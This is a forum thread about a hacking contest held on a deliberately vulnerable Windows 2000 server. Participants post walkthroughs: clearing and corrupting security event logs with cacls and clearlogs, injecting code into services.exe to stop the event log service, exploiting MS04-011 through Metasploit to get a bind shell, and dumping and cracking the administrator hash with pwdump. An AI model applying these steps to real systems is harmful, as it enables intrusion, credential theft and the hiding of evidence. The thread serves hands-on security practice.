Security practice (contest)

conceited · 10-07-2008 8:09pm

Well there's plenty of activity now.
Nice to see you trying gerry.

h57xiucj2z946q · 10-07-2008 8:17pm

Ok I cleared my logs, and probably everyone else's.

Stole Administrators hash also...
A country! Not in our continent!

conceited · 10-07-2008 8:47pm

Good job Damo i just checked the logs.
Stealing the admin password :rolleyes:

h57xiucj2z946q · 10-07-2008 8:48pm

Im gonna have a feed of guinness now!

conceited · 10-07-2008 9:13pm

Enjoy

h57xiucj2z946q · 10-07-2008 10:06pm

conceited wrote: »

Enjoy

were the logs ok? Did you see anything from me and not the others attempting the challenge? Using my phone to post this.

conceited · 10-07-2008 11:53pm

http://www.ultimatewindowssecurity.com/events/com185.html

That was the only log I'm not sure if it can be cleared?
This is quite interesting as i never knew this would happen.
Since your on your phone it was this.
"Event 517 is logged whenever the Security log is cleared, REGARDLESS of the status of the Audit System Events audit policy."

I'll leave it up anyway feel free to work away .

Martyr · 10-07-2008 11:57pm

stop the event log service, or is that not allowed?
you can re-schedule to service to start after you've left the system.
another way is to disable auditing of those events.

conceited · 11-07-2008 12:21am

IP Address change.
83.70.110.27

As far as i know if you turn it off it still logs it it seems.I just read that on a site as this is very interesting.

Martyr · 11-07-2008 1:41am

i was thinking of few ways, the least desirable method would be to kill the service (stop reboot with: shutdown -a) or disable the startup, then restart the system - could cause problem.

since only SYSTEM has full access to the event logs, what would happen if changing the ACL to deny everyone access?

it will accept SERVICE_CONTROL_SHUTDOWN, but i don't know if that'll work..probably would if running inside SYSTEM process, if not you could inject a DLL into the remote process that normally handles it.

has to be much easier way though..never thought about it, but its interesting alright.
....
a crude / simple hack i thought about last night was the fact these logs have ACL set for SYSTEM to have full access.

tested this on xp sp2, so maybe there is easier way on win2k sp0..?

* Deny SYSTEM access
* Grant Administrator access
* Clear logs using command line tool..
* Grant SYSTEM access

cacls C:\windows\system32\config\secevent.evt /D SYSTEM
cacls C:\windows\system32\config\secevent.evt /E /G Administrator:F
psloglist security -c
cacls C:\windows\system32\config\secevent.evt /G SYSTEM:F

this corrupts the security log though..and requires you [Clear all events] - does get rid of 517 message though.

on XP + 2k3, there is the volume shadow copy service which will allow replacing files even when they're "locked"

the more painful method would be to obtain the SERVICE_STATUS_HANDLE for EVENTLOG service and re-enable SERVICE_ACCEPT_STOP using SetServiceStatus() OR patch the kernel with a driver..or some other crappy way to stop the event log.

h57xiucj2z946q · 11-07-2008 9:54am

I know I tried to stop the event logger by "net stop even...." and it said stop/pause was unsupported for this service.

I seen a write up about creating a reg entry to disable the event logger, but it required a reboot. Then you can manually delete the *.evt files.

psloglist doesn't exist on Win 2000 but Im sure it's just a matter of transferring across.

h57xiucj2z946q · 11-07-2008 11:58am

If your ip changes much you should use dyndn.org or no-ip.com or similar.

h57xiucj2z946q · 11-07-2008 1:24pm

I'll do another report on this contest over the weekend if people want and if no-one else is attempting it?

livewire2k · 11-07-2008 3:57pm

well all, hmm.. im finding this chanllegen a bit harder! thx again conceited, im giong to keep trying this one~!

conceited · 12-07-2008 1:05am

Hi lads,

I'm reading up on the windows api's on msdn and educating myself about this.I don't know much about it and will try some of your suggestions joe.
Damo another report would be great.As i'm writting this now someone is trying the server.:pac:

Limewire glad your finding this a challenge alot harder haha.Things are going to get alot harder as the weeks go on.Won't be just exploits.

Martyr · 12-07-2008 3:22pm

psloglist doesn't exist on Win 2000 but Im sure it's just a matter of transferring across

should have said this is part of pstools by sysinternals.

I'm reading up on the windows api's on msdn and educating myself about this.I don't know much about it and will try some of your suggestions joe.

i looked at the internals of services.exe and it loads eventlog.dll which then creates the service.
wrote a program yesterday to try stop it but i got fed up after the computer kept freezing needing reboot.

you can enumerate the handles of a process from usermode using NtQuerySystemInformation and info class SystemHandleInformation, then use DuplicateHandle and ..i thought SetServiceStatus would work with SERVICE_ACCEPT_STOP
i'm gonna try injecting code into services.exe later to see if that works.

Martyr · 13-07-2008 4:36am

just gave this a try tonight.

theres no way to enumerate the service control handles, but each process that runs a service or more has a dispatch table with the service name, handler routine and control handle.

StartServiceCtrlDispatcher allocates this structure from the heap, so you can walk the heaplist and find the service table entry, then inject code to the remote process to call SetServiceStatus()

i'll post code/more detail about this later as i think it might help in other situations such as terminating malware service..even though it didn't work for eventlog.

c:\sc query eventlog

SERVICE_NAME: eventlog
        TYPE               : 20  WIN32_SHARE_PROCESS
        STATE              : 4  RUNNING
                                (NOT_STOPPABLE,NOT_PAUSABLE,ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

c:\sevent 796       <-- process id of services.exe

EVENTLOG service found, service handle = 000B9718
Injecting code into remote process
Creating remote thread with code:00CB0000 - data:006B0000
Waiting for thread to exit...
SetServiceStatus error code:0

c:\sc query eventlog

SERVICE_NAME: eventlog
        TYPE               : 20  WIN32_SHARE_PROCESS
        STATE              : 3  STOP_PENDING
                                (STOPPABLE,PAUSABLE,ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

it appears to work, but when trying to stop with net.exe

c:\net stop eventlog
The service could not be controlled in its present state.

More help is available by typing NET HELPMSG 2189.

there is an internal routine called ElfBeginForcedShutdown() which you
could *possibly* run remotely using a hardcoded address, haven't tried that yet.

theres also StopLPCThread which terminates the local named pipe/port and thread that handles event messages sent from other applications..

i'd not say its impossible to stop the service in elegant fashion, but for now
i'm out of ideas - tbh, i was just curious to see how it could be terminated in a safe way.

you can go ahead and kill services.exe, but the system becomes unstable after some time.

Forgot to mention, the procedure that reports event of log being cleared is called ElfpGenerateLogClearedEvent()
if you google that, you can find the actual win2k source code that documents it...

acidstorm · 13-07-2008 7:04pm

I can't even seem to get in.. I am so ashamed of myself right now. Metasploit cant send the RPC packets for the RPC-DCOM exploit even after I set a passthrough at my router. The RPC -DNS isnt working either. I know there are three ports open and I am still thinking of the last port...

I dont know but If the service is stopped, can Alternate data streams help to hide the logfiles themselves like ... after wiping the previous one, thus hiding the fact that someone cleared them.

As for me, I have just ordered Hacking Exposed "Windows... Solutions" to sharpen/develop my 1337 haXor skillz.

Martyr · 13-07-2008 7:36pm

can Alternate data streams help to hide the logfiles themselves like ... after wiping the previous one, thus hiding the fact that someone cleared them.

the event logs are opened by various different SYSTEM processes..you can open them to read, but you can't write to them.. but it may be possible to inject code into LSASS.EXE which is allowed to write over them.

hobocopy is a program that uses the VSCS to read/write any file on disk, althought its not supported on win2k.

h57xiucj2z946q · 13-07-2008 8:33pm

Some good discussions here.

Martyr · 14-07-2008 2:32am

there is a way to stop the eventlog alot easier than i thought..and it can be restarted at any time without giving an error or making the system unstable. (not 100% now about this)

once stopped, delete *.evt files from %SYSTEMROOT%\system32\config folder and re-schedule/restart service anytime you want. (atleast before any future reboot of the system)

the ElfControlResponse handler registered when the service starts will only accept SERVICE_CONTROL_SHUTDOWN code, which even when using ControlService() API under SYSTEM account gets ignored..

the program i wrote goes through the heap list of SERVICES.EXE until it finds the EVENTLOG dispatch entry, then it uses CreateRemoteThread() pointing to ElfControlResponse with parameter of SERVICE_CONTROL_SHUTDOWN - this works perfect.

EDIT: i just noticed that if the EL service is running before using this program (i've called 'ELSTOP') you should also re-start it afterwards..this might be nothing at all, but system seemed to wait for response from event logger before shutting down.

ELSTOP

can somebody test it on win2k? only ran on winxp sp3 so far, works fine.

Martyr · 14-07-2008 6:20pm

thanks.tested on vista, didn't work..but anyway, sorry if i hijacked the thread over this one thing.what about your report Damo?

h57xiucj2z946q · 14-07-2008 6:31pm

Just a quick write up on the 2nd challenge.
For this challenge, I mainly used Vista :-)

Ok first of I scan the victim with Nessus. You'll get many holes been reported on this system as been present.
They are mainly around Windows networking ports...
Here is some which I found:

MS RPC Services null pointer reference DoS (135)

Microsoft Hotfix for KB835732 (SMB check) (139/445)
http://www.microsoft.com/technet/security/bulletin/ms04-011.mspx

Vulnerability in Plug and Play Could Allow Remote Code Execution and Local Elevation of Privilege (905749) - Network Check (139/445)
http://www.microsoft.com/technet/security/bulletin/ms05-047.mspx

Vulnerability in Plug and Play Service Could Allow Remote Code Execution (899588) - Network Check (139/445)
http://www.microsoft.com/technet/security/bulletin/ms05-039.mspx

SMB OpenEventLog() over srvsvc (139/445)

Vulnerability in Server Service Could Allow Remote Code Execution (921883) - Network check (139/445)
http://www.microsoft.com/technet/security/bulletin/ms06-040.mspx

Vulnerability in Server Service Could Allow Remote Code Execution (917159) - Network check (139/445)
http://www.microsoft.com/technet/security/bulletin/ms06-035.mspx

Vulnerability in Printer Spooler Service Could Allow Remote Code Execution (896423) - Network Check (139/445)
http://www.microsoft.com/technet/security/bulletin/ms05-043.mspx

Vulnerability in SMB Could Allow Remote Code Execution (896422) - Network Check (139/445)
http://www.microsoft.com/technet/security/bulletin/ms05-027.mspx

SMB null param count DoS (139/445)

MS Task Scheduler vulnerability (1025)
http://www.microsoft.com/technet/security/bulletin/ms04-022.mspx

Ok so we have many to choose from.
Note: if your security scanner is not giving you many results, your ISP may have blocked windows networking ports (135-139/445). This was common behaviour when the ms blaster/sasser and other worms were in the wild.

Now that we know the weaknesses, we need to choose 1 and launch an exploit against that weakness. The best way to find exploits are to search for the ms bulletin announcment number for that weakness on sites such as milw0rm.com
For me, I choose Microsoft Hotfix for KB835732 (SMB check) (139/445), so I just search for 04-011 on milw0rm.com to see many exploits.
http://www.milw0rm.com/exploits/295 would be ideal. If you dont have the time or environment to compile that source, you can simply install Metasploit Framework available at www.metasploit.com. The web interface is probably the easiest if you are new to this. (some scripts in metasploit may trigger your antivirus software). Metasploit contains exploits for most of the holes mentioned above, again I'll choose the same weakness as before, so search for SMB in Metasploit in the web interface, select Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow which is a 04-011 exploit. The target is Windows 2000. Select the payload as windows/shell/bind_tcp (note: as conceited has forwarded all ports to this win2k machine, what ever port our exploit binds a shell to will also be forwarded to the win2k machine also, if this wasn't the case, then we could have selected the payload windows/shell/reverse_tcp, this way the win2k machine would connect back to us on a port with a reversed shell. You of course would need to have this port open in your router/firewall/gateway).

After you select the payload, fill in the target ip address, the rest of the details are ok. Hit exploit. If the exploit is successful, you will be connected to the victim on whatever port you choose (4444 is default) and have a shell. There is a chance you'll crash the server either :-(

Ok, we have to create a text file on the Administrators desktop:
chdir c:\documents and settings\Administrator\Desktop\
echo Damo >> Damo.txt

Now we have to clear logs. This is sorta tricky. What I did is send a file called clearlogs.exe to the server. (google it, again some antivirus dont like this file). You can send files to the server by hosting your own tftp/ftp server explained in my previous report in this thread and make the victim connect and download files from it.

run:
clearlogs -sec
clearlogs -app
clearlogs -sys
del clearlogs.exe

Or you can upload the tool Average Joe wrote (elfstop) to disable the Event Log service. Then delete the c:\winnt\system32\config\*.evt files. Start the event log service again.. net start "windows event log" might work?

Now you have your name on the desktop and cleared your logs!

As a bonus, I uploaded pwdump2 to the server. Snagged the Administrators hash, used rainbow tables at #rainbowcrack on irc.plain-text.info. Within minutes you'll have the administrators password.
If you want, you can then use a tool called psexec to launch commands on the server remotely. You can also browse samba shares with Administrator credentials by going to \\xxx.xxx.xxx.xxx\c$\ or if using linux, then using the appropiate smb utility of your choice (ubuntu has a really nice one, the folder you want to go to is c$, a default share). Thats really it.

Enjoy...

livewire2k · 14-07-2008 7:53pm

ok nice work DAMO2K on your second report~! Im am haveing trouble with this one, my ISP (im with Digiweb) they most be blocking ports on me like 445 etc..

so i didnt get this chanllenge done, i spend a day trowing exploits at the sever, useing windows(XP pro), Backtrack , Nessus & metsploit but no good!

Hope the next challege will be good one!

thx once again Livewire hope to chat yas soon

conceited
Damo2k
Average Joe

http://blacknite.eu

Martyr · 14-07-2008 8:14pm

Start the event log service again.. net start "windows event log" might work?

either will work:

net start eventlog
sc start eventlog (sc might not be available on win2k)

Good job, Damo.

h57xiucj2z946q · 14-07-2008 11:12pm

Cheers

conceited · 15-07-2008 12:20am

Damo that report is great.It should help people out and hopefully get more interested in the challenges.I really liked the cracking the admin password part

Joe your a pretty smart guy I tried your tool works great .

Changing 445 to 5445 for you livewire try it from now on.
The ip is now 83.70.108.245

Hope you enjoyed this one.

livewire2k · 15-07-2008 2:41pm

OK its livewire ere,

thx for changing the port conceited ( it was im ISP blocking ports on me)
ok i did the same as Damo loaded up metsploit filled in all the port numbers and ip, and it worked like a charm. Then i uploaded Pwdump4 via TFTP
this is the result i got (not showing admin pass just the empty passwords)

Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::
hackme:1000:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::

i then downloaded clearlogs.exeand ran that (o i allso but the txt on the DeskTop) maybe ill try install VNC on to it see how that works out.

thx once again conceited

peace livewire!

livewire2k · 15-07-2008 2:50pm

ok back again, just ask conceited is it all right to install VNC on your server?
if not thats grand, iv completed the challenge anyway get back to me!

btw i could set up a challenge on a linux server if wanted! Looking fwd to the nextchallenge!

peace Livewire

http://blacknite.eu

conceited · 15-07-2008 3:48pm

Funny thing for an isp to do isn't it .I wonder whats their reason for doing such a thing? Seen your text file livewire, did you feel it was difficult? Glad you got it .

I haven't monitored the server much so vnc could already be installed for all i know

I've taken down the server now anyway and I'm going to prepare the next challenge.If everything goes to plan it will be up for tomorrow night at 6pm.

Livewire if you host a server I don't think you'll get many more people trying it than whats trying mine, but it's still fun either way.I actually thought alot more people would be interested in it.

Not all my challenges will involve ready made exploits either because anyone can click a mouse as was said.
Thanks again Damo2k your report of the hacks are great.

Security practice (contest)

Comments